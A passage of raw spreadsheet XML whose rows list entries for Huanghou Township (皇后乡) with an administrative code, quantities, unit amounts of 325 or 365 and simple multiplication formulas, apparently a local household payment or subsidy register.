    </row>
    <row r="1890" customHeight="1" spans="1:11">
      <c r="A1890" s="16" t="s">
        <v>5043</v>
      </c>
      <c r="B1890" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1890" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1890" s="17" t="s">
        <v>5044</v>
      </c>
      <c r="E1890" s="17" t="s">
        <v>4930</v>
      </c>
      <c r="F1890" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1890" s="17">
        <v>2</v>
      </c>
      <c r="H1890" s="18">
        <v>325</v>
      </c>
      <c r="I1890" s="17">
        <f>H1890*G1890</f>
        <v>650</v>
      </c>
      <c r="J1890" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1890" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1891" customHeight="1" spans="1:11">
      <c r="A1891" s="16" t="s">
        <v>5045</v>
      </c>
      <c r="B1891" s="17" t="str">
        <f>B1890</f>
        <v>皇后乡</v>
      </c>
      <c r="C1891" s="17" t="str">
        <f>C1890</f>
        <v>皇后乡</v>
      </c>
      <c r="D1891" s="16" t="s">
        <v>5046</v>
      </c>
      <c r="E1891" s="16" t="s">
        <v>4874</v>
      </c>
      <c r="F1891" s="17" t="str">
        <f>F1890</f>
        <v>4113210615</v>
      </c>
      <c r="G1891" s="17"/>
      <c r="H1891" s="17"/>
      <c r="I1891" s="17"/>
      <c r="J1891" s="17"/>
      <c r="K1891" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1892" customHeight="1" spans="1:11">
      <c r="A1892" s="16" t="s">
        <v>5047</v>
      </c>
      <c r="B1892" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1892" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1892" s="17" t="s">
        <v>5048</v>
      </c>
      <c r="E1892" s="17" t="s">
        <v>4791</v>
      </c>
      <c r="F1892" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1892" s="17">
        <v>3</v>
      </c>
      <c r="H1892" s="18">
        <v>290</v>
      </c>
      <c r="I1892" s="17">
        <f>H1892*G1892</f>
        <v>870</v>
      </c>
      <c r="J1892" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1892" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1893" customHeight="1" spans="1:11">
      <c r="A1893" s="16" t="s">
        <v>5049</v>
      </c>
      <c r="B1893" s="17" t="str">
        <f>B1892</f>
        <v>皇后乡</v>
      </c>
      <c r="C1893" s="17" t="str">
        <f>C1892</f>
        <v>皇后乡</v>
      </c>
      <c r="D1893" s="16" t="s">
        <v>5050</v>
      </c>
      <c r="E1893" s="16" t="s">
        <v>4759</v>
      </c>
      <c r="F1893" s="17" t="str">
        <f>F1892</f>
        <v>4113210615</v>
      </c>
      <c r="G1893" s="17"/>
      <c r="H1893" s="17"/>
      <c r="I1893" s="17"/>
      <c r="J1893" s="17"/>
      <c r="K1893" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1894" customHeight="1" spans="1:11">
      <c r="A1894" s="16" t="s">
        <v>5051</v>
      </c>
      <c r="B1894" s="17" t="str">
        <f>B1893</f>
        <v>皇后乡</v>
      </c>
      <c r="C1894" s="17" t="str">
        <f>C1893</f>
        <v>皇后乡</v>
      </c>
      <c r="D1894" s="25" t="s">
        <v>5052</v>
      </c>
      <c r="E1894" s="25" t="s">
        <v>5053</v>
      </c>
      <c r="F1894" s="17" t="str">
        <f>F1893</f>
        <v>4113210615</v>
      </c>
      <c r="G1894" s="17"/>
      <c r="H1894" s="17"/>
      <c r="I1894" s="17"/>
      <c r="J1894" s="17"/>
      <c r="K1894" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1895" customHeight="1" spans="1:11">
      <c r="A1895" s="16" t="s">
        <v>5054</v>
      </c>
      <c r="B1895" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1895" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1895" s="17" t="s">
        <v>5055</v>
      </c>
      <c r="E1895" s="17" t="s">
        <v>5056</v>
      </c>
      <c r="F1895" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1895" s="17">
        <v>2</v>
      </c>
      <c r="H1895" s="18">
        <v>325</v>
      </c>
      <c r="I1895" s="17">
        <f>H1895*G1895</f>
        <v>650</v>
      </c>
      <c r="J1895" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1895" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1896" customHeight="1" spans="1:11">
      <c r="A1896" s="16" t="s">
        <v>5057</v>
      </c>
      <c r="B1896" s="17" t="str">
        <f>B1895</f>
        <v>皇后乡</v>
      </c>
      <c r="C1896" s="17" t="str">
        <f>C1895</f>
        <v>皇后乡</v>
      </c>
      <c r="D1896" s="16" t="s">
        <v>5058</v>
      </c>
      <c r="E1896" s="16" t="s">
        <v>5059</v>
      </c>
      <c r="F1896" s="17" t="str">
        <f>F1895</f>
        <v>4113210615</v>
      </c>
      <c r="G1896" s="17"/>
      <c r="H1896" s="17"/>
      <c r="I1896" s="17"/>
      <c r="J1896" s="17"/>
      <c r="K1896" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1897" customHeight="1" spans="1:11">
      <c r="A1897" s="16" t="s">
        <v>5060</v>
      </c>
      <c r="B1897" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1897" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1897" s="17" t="s">
        <v>5061</v>
      </c>
      <c r="E1897" s="17" t="s">
        <v>4877</v>
      </c>
      <c r="F1897" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1897" s="17">
        <v>2</v>
      </c>
      <c r="H1897" s="18">
        <v>325</v>
      </c>
      <c r="I1897" s="17">
        <f>H1897*G1897</f>
        <v>650</v>
      </c>
      <c r="J1897" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1897" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1898" customHeight="1" spans="1:11">
      <c r="A1898" s="16" t="s">
        <v>5062</v>
      </c>
      <c r="B1898" s="17" t="str">
        <f>B1897</f>
        <v>皇后乡</v>
      </c>
      <c r="C1898" s="17" t="str">
        <f>C1897</f>
        <v>皇后乡</v>
      </c>
      <c r="D1898" s="16" t="s">
        <v>5063</v>
      </c>
      <c r="E1898" s="74" t="s">
        <v>4962</v>
      </c>
      <c r="F1898" s="17" t="str">
        <f>F1897</f>
        <v>4113210615</v>
      </c>
      <c r="G1898" s="17"/>
      <c r="H1898" s="17"/>
      <c r="I1898" s="17"/>
      <c r="J1898" s="17"/>
      <c r="K1898" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1899" customHeight="1" spans="1:11">
      <c r="A1899" s="16" t="s">
        <v>5064</v>
      </c>
      <c r="B1899" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1899" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1899" s="17" t="s">
        <v>5065</v>
      </c>
      <c r="E1899" s="17" t="s">
        <v>5066</v>
      </c>
      <c r="F1899" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1899" s="17">
        <v>2</v>
      </c>
      <c r="H1899" s="18">
        <v>325</v>
      </c>
      <c r="I1899" s="17">
        <f>H1899*G1899</f>
        <v>650</v>
      </c>
      <c r="J1899" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1899" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1900" customHeight="1" spans="1:11">
      <c r="A1900" s="16" t="s">
        <v>5067</v>
      </c>
      <c r="B1900" s="17" t="str">
        <f>B1899</f>
        <v>皇后乡</v>
      </c>
      <c r="C1900" s="17" t="str">
        <f>C1899</f>
        <v>皇后乡</v>
      </c>
      <c r="D1900" s="16" t="s">
        <v>5068</v>
      </c>
      <c r="E1900" s="16" t="s">
        <v>5069</v>
      </c>
      <c r="F1900" s="17" t="str">
        <f>F1899</f>
        <v>4113210615</v>
      </c>
      <c r="G1900" s="17"/>
      <c r="H1900" s="17"/>
      <c r="I1900" s="17"/>
      <c r="J1900" s="17"/>
      <c r="K1900" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1901" customHeight="1" spans="1:11">
      <c r="A1901" s="16" t="s">
        <v>5070</v>
      </c>
      <c r="B1901" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1901" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1901" s="17" t="s">
        <v>5071</v>
      </c>
      <c r="E1901" s="17" t="s">
        <v>4736</v>
      </c>
      <c r="F1901" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1901" s="17">
        <v>2</v>
      </c>
      <c r="H1901" s="18">
        <v>325</v>
      </c>
      <c r="I1901" s="17">
        <f>H1901*G1901</f>
        <v>650</v>
      </c>
      <c r="J1901" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1901" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1902" customHeight="1" spans="1:11">
      <c r="A1902" s="16" t="s">
        <v>5072</v>
      </c>
      <c r="B1902" s="17" t="str">
        <f>B1901</f>
        <v>皇后乡</v>
      </c>
      <c r="C1902" s="17" t="str">
        <f>C1901</f>
        <v>皇后乡</v>
      </c>
      <c r="D1902" s="16" t="s">
        <v>5073</v>
      </c>
      <c r="E1902" s="16" t="s">
        <v>5074</v>
      </c>
      <c r="F1902" s="17" t="str">
        <f>F1901</f>
        <v>4113210615</v>
      </c>
      <c r="G1902" s="17"/>
      <c r="H1902" s="17"/>
      <c r="I1902" s="17"/>
      <c r="J1902" s="17"/>
      <c r="K1902" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1903" customHeight="1" spans="1:11">
      <c r="A1903" s="16" t="s">
        <v>5075</v>
      </c>
      <c r="B1903" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1903" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1903" s="17" t="s">
        <v>5076</v>
      </c>
      <c r="E1903" s="17" t="s">
        <v>4770</v>
      </c>
      <c r="F1903" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1903" s="17">
        <v>1</v>
      </c>
      <c r="H1903" s="18">
        <v>365</v>
      </c>
      <c r="I1903" s="17">
        <f>H1903*G1903</f>
        <v>365</v>
      </c>
      <c r="J1903" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1903" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1904" customHeight="1" spans="1:11">
      <c r="A1904" s="16" t="s">
        <v>5077</v>
      </c>
      <c r="B1904" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1904" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1904" s="17" t="s">
        <v>5078</v>
      </c>
      <c r="E1904" s="17" t="s">
        <v>4754</v>
      </c>
      <c r="F1904" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1904" s="17">
        <v>1</v>
      </c>
      <c r="H1904" s="18">
        <v>365</v>
      </c>
      <c r="I1904" s="17">
        <f>H1904*G1904</f>
        <v>365</v>
      </c>
      <c r="J1904" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1904" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1905" customHeight="1" spans="1:11">
      <c r="A1905" s="16" t="s">
        <v>5079</v>
      </c>
      <c r="B1905" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1905" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1905" s="17" t="s">
        <v>5080</v>
      </c>
      <c r="E1905" s="17" t="s">
        <v>4914</v>
      </c>
      <c r="F1905" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1905" s="17">
        <v>1</v>
      </c>
      <c r="H1905" s="18">
        <v>365</v>
      </c>
      <c r="I1905" s="17">
        <f>H1905*G1905</f>
        <v>365</v>
      </c>
      <c r="J1905" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1905" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1906" customHeight="1" spans="1:11">
      <c r="A1906" s="16" t="s">
        <v>5081</v>
      </c>
      <c r="B1906" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1906" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1906" s="17" t="s">
        <v>5082</v>
      </c>
      <c r="E1906" s="17" t="s">
        <v>4838</v>
      </c>
      <c r="F1906" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1906" s="17">
        <v>1</v>
      </c>
      <c r="H1906" s="18">
        <v>365</v>
      </c>
      <c r="I1906" s="17">
        <f>H1906*G1906</f>
        <v>365</v>
      </c>
      <c r="J1906" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1906" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1907" customHeight="1" spans="1:11">
      <c r="A1907" s="16" t="s">
        <v>5083</v>
      </c>
      <c r="B1907" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1907" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1907" s="17" t="s">
        <v>5084</v>
      </c>
      <c r="E1907" s="17" t="s">
        <v>5085</v>
      </c>
      <c r="F1907" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1907" s="17">
        <v>2</v>
      </c>
      <c r="H1907" s="18">
        <v>325</v>
      </c>
      <c r="I1907" s="17">
        <f>H1907*G1907</f>
        <v>650</v>
      </c>
      <c r="J1907" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1907" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1908" customHeight="1" spans="1:11">
      <c r="A1908" s="16" t="s">
        <v>5086</v>
      </c>
      <c r="B1908" s="17" t="str">
        <f>B1907</f>
        <v>皇后乡</v>
      </c>
      <c r="C1908" s="17" t="str">
        <f>C1907</f>
        <v>皇后乡</v>
      </c>
      <c r="D1908" s="16" t="s">
        <v>5087</v>
      </c>
      <c r="E1908" s="16" t="s">
        <v>5088</v>
      </c>
      <c r="F1908" s="17" t="str">
        <f>F1907</f>
        <v>4113210615</v>
      </c>
      <c r="G1908" s="17"/>
      <c r="H1908" s="17"/>
      <c r="I1908" s="17"/>
      <c r="J1908" s="17"/>
      <c r="K1908" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1909" customHeight="1" spans="1:11">
      <c r="A1909" s="16" t="s">
        <v>5089</v>
      </c>
      <c r="B1909" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1909" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1909" s="17" t="s">
        <v>5090</v>
      </c>
      <c r="E1909" s="17" t="s">
        <v>5091</v>
      </c>
      <c r="F1909" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1909" s="17">
        <v>1</v>
      </c>
      <c r="H1909" s="18">
        <v>365</v>
      </c>
      <c r="I1909" s="17">
        <f>H1909*G1909</f>
        <v>365</v>
      </c>
      <c r="J1909" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1909" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1910" customHeight="1" spans="1:11">
      <c r="A1910" s="16" t="s">
        <v>5092</v>
      </c>
      <c r="B1910" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1910" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1910" s="17" t="s">
        <v>5093</v>
      </c>
      <c r="E1910" s="17" t="s">
        <v>4835</v>
      </c>
      <c r="F1910" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1910" s="17">
        <v>1</v>
      </c>
      <c r="H1910" s="18">
        <v>365</v>
      </c>
      <c r="I1910" s="17">
        <f>H1910*G1910</f>
        <v>365</v>
      </c>
      <c r="J1910" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1910" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1911" customHeight="1" spans="1:11">
      <c r="A1911" s="16" t="s">
        <v>5094</v>
      </c>
      <c r="B1911" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1911" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1911" s="17" t="s">
        <v>5095</v>
      </c>
      <c r="E1911" s="17" t="s">
        <v>4930</v>
      </c>
      <c r="F1911" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1911" s="17">
        <v>2</v>
      </c>
      <c r="H1911" s="18">
        <v>325</v>
      </c>
      <c r="I1911" s="17">
        <f>H1911*G1911</f>
        <v>650</v>
      </c>
      <c r="J1911" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1911" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1912" customHeight="1" spans="1:11">
      <c r="A1912" s="16" t="s">
        <v>5096</v>
      </c>
      <c r="B1912" s="17" t="str">
        <f>B1911</f>
        <v>皇后乡</v>
      </c>
      <c r="C1912" s="17" t="str">
        <f>C1911</f>
        <v>皇后乡</v>
      </c>
      <c r="D1912" s="16" t="s">
        <v>5097</v>
      </c>
      <c r="E1912" s="16" t="s">
        <v>4914</v>
      </c>
      <c r="F1912" s="17" t="str">
        <f>F1911</f>
        <v>4113210615</v>
      </c>
      <c r="G1912" s="17"/>
      <c r="H1912" s="17"/>
      <c r="I1912" s="17"/>
      <c r="J1912" s="17"/>
      <c r="K1912" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1913" customHeight="1" spans="1:11">
      <c r="A1913" s="16" t="s">
        <v>5098</v>
      </c>
      <c r="B1913" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1913" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1913" s="17" t="s">
        <v>5099</v>
      </c>
      <c r="E1913" s="17" t="s">
        <v>4782</v>
      </c>
      <c r="F1913" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1913" s="17">
        <v>2</v>
      </c>
      <c r="H1913" s="18">
        <v>325</v>
      </c>
      <c r="I1913" s="17">
        <f>H1913*G1913</f>
        <v>650</v>
      </c>
      <c r="J1913" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1913" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1914" customHeight="1" spans="1:11">
      <c r="A1914" s="16" t="s">
        <v>5100</v>
      </c>
      <c r="B1914" s="17" t="str">
        <f>B1913</f>
        <v>皇后乡</v>
      </c>
      <c r="C1914" s="17" t="str">
        <f>C1913</f>
        <v>皇后乡</v>
      </c>
      <c r="D1914" s="16" t="s">
        <v>5101</v>
      </c>
      <c r="E1914" s="16" t="s">
        <v>5102</v>
      </c>
      <c r="F1914" s="17" t="str">
        <f>F1913</f>
        <v>4113210615</v>
      </c>
      <c r="G1914" s="17"/>
      <c r="H1914" s="17"/>
      <c r="I1914" s="17"/>
      <c r="J1914" s="17"/>
      <c r="K1914" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1915" customHeight="1" spans="1:11">
      <c r="A1915" s="16" t="s">
        <v>5103</v>
      </c>
      <c r="B1915" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1915" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1915" s="17" t="s">
        <v>5104</v>
      </c>
      <c r="E1915" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1915" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1915" s="17">
        <v>1</v>
      </c>
      <c r="H1915" s="18">
        <v>365</v>
      </c>
      <c r="I1915" s="17">
        <f>H1915*G1915</f>
        <v>365</v>
      </c>
      <c r="J1915" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1915" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1916" customHeight="1" spans="1:11">
      <c r="A1916" s="16" t="s">
        <v>5105</v>
      </c>
      <c r="B1916" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1916" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1916" s="17" t="s">
        <v>5106</v>
      </c>
      <c r="E1916" s="17" t="s">
        <v>4997</v>
      </c>
      <c r="F1916" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1916" s="17">
        <v>2</v>
      </c>
      <c r="H1916" s="18">
        <v>325</v>
      </c>
      <c r="I1916" s="17">
        <f>H1916*G1916</f>
        <v>650</v>
      </c>
      <c r="J1916" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1916" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1917" customHeight="1" spans="1:11">
      <c r="A1917" s="16" t="s">
        <v>5107</v>
      </c>
      <c r="B1917" s="17" t="str">
        <f>B1916</f>
        <v>皇后乡</v>
      </c>
      <c r="C1917" s="17" t="str">
        <f>C1916</f>
        <v>皇后乡</v>
      </c>
      <c r="D1917" s="16" t="s">
        <v>5108</v>
      </c>
      <c r="E1917" s="16" t="s">
        <v>5109</v>
      </c>
      <c r="F1917" s="17" t="str">
        <f>F1916</f>
        <v>4113210615</v>
      </c>
      <c r="G1917" s="17"/>
      <c r="H1917" s="17"/>
      <c r="I1917" s="17"/>
      <c r="J1917" s="17"/>
      <c r="K1917" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1918" customHeight="1" spans="1:11">
      <c r="A1918" s="16" t="s">
        <v>5110</v>
      </c>
      <c r="B1918" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1918" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1918" s="17" t="s">
        <v>5111</v>
      </c>
      <c r="E1918" s="17" t="s">
        <v>4930</v>
      </c>
      <c r="F1918" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1918" s="17">
        <v>1</v>
      </c>
      <c r="H1918" s="18">
        <v>365</v>
      </c>
      <c r="I1918" s="17">
        <f>H1918*G1918</f>
        <v>365</v>
      </c>
      <c r="J1918" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1918" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1919" customHeight="1" spans="1:11">
      <c r="A1919" s="16" t="s">
        <v>5112</v>
      </c>
      <c r="B1919" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1919" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1919" s="17" t="s">
        <v>5113</v>
      </c>
      <c r="E1919" s="17" t="s">
        <v>4751</v>
      </c>
      <c r="F1919" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1919" s="17">
        <v>1</v>
      </c>
      <c r="H1919" s="18">
        <v>365</v>
      </c>
      <c r="I1919" s="17">
        <f>H1919*G1919</f>
        <v>365</v>
      </c>
      <c r="J1919" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1919" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1920" customHeight="1" spans="1:11">
      <c r="A1920" s="16" t="s">
        <v>5114</v>
      </c>
      <c r="B1920" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1920" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1920" s="17" t="s">
        <v>5115</v>
      </c>
      <c r="E1920" s="17" t="s">
        <v>5116</v>
      </c>
      <c r="F1920" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1920" s="17">
        <v>1</v>
      </c>
      <c r="H1920" s="18">
        <v>365</v>
      </c>
      <c r="I1920" s="17">
        <f>H1920*G1920</f>
        <v>365</v>
      </c>
      <c r="J1920" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1920" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1921" customHeight="1" spans="1:11">
      <c r="A1921" s="16" t="s">
        <v>5117</v>
      </c>
      <c r="B1921" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1921" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1921" s="17" t="s">
        <v>5118</v>
      </c>
      <c r="E1921" s="17" t="s">
        <v>4827</v>
      </c>
      <c r="F1921" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1921" s="17">
        <v>2</v>
      </c>
      <c r="H1921" s="18">
        <v>325</v>
      </c>
      <c r="I1921" s="17">
        <f>H1921*G1921</f>
        <v>650</v>
      </c>
      <c r="J1921" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1921" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1922" customHeight="1" spans="1:11">
      <c r="A1922" s="16" t="s">
        <v>5119</v>
      </c>
      <c r="B1922" s="17" t="str">
        <f>B1921</f>
        <v>皇后乡</v>
      </c>
      <c r="C1922" s="17" t="str">
        <f>C1921</f>
        <v>皇后乡</v>
      </c>
      <c r="D1922" s="23" t="s">
        <v>5120</v>
      </c>
      <c r="E1922" s="24" t="s">
        <v>4810</v>
      </c>
      <c r="F1922" s="17" t="str">
        <f>F1921</f>
        <v>4113210615</v>
      </c>
      <c r="G1922" s="17"/>
      <c r="H1922" s="17"/>
      <c r="I1922" s="17"/>
      <c r="J1922" s="17"/>
      <c r="K1922" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1923" customHeight="1" spans="1:11">
      <c r="A1923" s="16" t="s">
        <v>5121</v>
      </c>
      <c r="B1923" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1923" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1923" s="17" t="s">
        <v>5122</v>
      </c>
      <c r="E1923" s="17" t="s">
        <v>4919</v>
      </c>
      <c r="F1923" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1923" s="17">
        <v>1</v>
      </c>
      <c r="H1923" s="18">
        <v>365</v>
      </c>
      <c r="I1923" s="17">
        <f>H1923*G1923</f>
        <v>365</v>
      </c>
      <c r="J1923" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1923" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1924" customHeight="1" spans="1:11">
      <c r="A1924" s="16" t="s">
        <v>5123</v>
      </c>
      <c r="B1924" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1924" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1924" s="17" t="s">
        <v>5124</v>
      </c>
      <c r="E1924" s="17" t="s">
        <v>4776</v>
      </c>
      <c r="F1924" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1924" s="17">
        <v>1</v>
      </c>
      <c r="H1924" s="18">
        <v>365</v>
      </c>
      <c r="I1924" s="17">
        <f>H1924*G1924</f>
        <v>365</v>
      </c>
      <c r="J1924" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1924" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1925" customHeight="1" spans="1:11">
      <c r="A1925" s="16" t="s">
        <v>5125</v>
      </c>
      <c r="B1925" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1925" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1925" s="17" t="s">
        <v>5126</v>
      </c>
      <c r="E1925" s="17" t="s">
        <v>5027</v>
      </c>
      <c r="F1925" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1925" s="17">
        <v>2</v>
      </c>
      <c r="H1925" s="18">
        <v>325</v>
      </c>
      <c r="I1925" s="17">
        <f>H1925*G1925</f>
        <v>650</v>
      </c>
      <c r="J1925" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1925" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1926" customHeight="1" spans="1:11">
      <c r="A1926" s="16" t="s">
        <v>5127</v>
      </c>
      <c r="B1926" s="17" t="str">
        <f>B1925</f>
        <v>皇后乡</v>
      </c>
      <c r="C1926" s="17" t="str">
        <f>C1925</f>
        <v>皇后乡</v>
      </c>
      <c r="D1926" s="16" t="s">
        <v>5128</v>
      </c>
      <c r="E1926" s="25" t="s">
        <v>5129</v>
      </c>
      <c r="F1926" s="17" t="str">
        <f>F1925</f>
        <v>4113210615</v>
      </c>
      <c r="G1926" s="17"/>
      <c r="H1926" s="17"/>
      <c r="I1926" s="17"/>
      <c r="J1926" s="17"/>
      <c r="K1926" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1927" customHeight="1" spans="1:11">
      <c r="A1927" s="16" t="s">
        <v>5130</v>
      </c>
      <c r="B1927" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1927" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1927" s="17" t="s">
        <v>5131</v>
      </c>
      <c r="E1927" s="17" t="s">
        <v>4962</v>
      </c>
      <c r="F1927" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1927" s="17">
        <v>2</v>
      </c>
      <c r="H1927" s="18">
        <v>325</v>
      </c>
      <c r="I1927" s="17">
        <f>H1927*G1927</f>
        <v>650</v>
      </c>
      <c r="J1927" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1927" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1928" customHeight="1" spans="1:11">
      <c r="A1928" s="16" t="s">
        <v>5132</v>
      </c>
      <c r="B1928" s="17" t="str">
        <f>B1927</f>
        <v>皇后乡</v>
      </c>
      <c r="C1928" s="17" t="str">
        <f>C1927</f>
        <v>皇后乡</v>
      </c>
      <c r="D1928" s="16" t="s">
        <v>5133</v>
      </c>
      <c r="E1928" s="16" t="s">
        <v>5134</v>
      </c>
      <c r="F1928" s="17" t="str">
        <f>F1927</f>
        <v>4113210615</v>
      </c>
      <c r="G1928" s="17"/>
      <c r="H1928" s="17"/>
      <c r="I1928" s="17"/>
      <c r="J1928" s="17"/>
      <c r="K1928" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1929" customHeight="1" spans="1:11">
      <c r="A1929" s="16" t="s">
        <v>5135</v>
      </c>
      <c r="B1929" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1929" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1929" s="17" t="s">
        <v>5136</v>
      </c>
      <c r="E1929" s="17" t="s">
        <v>5116</v>
      </c>
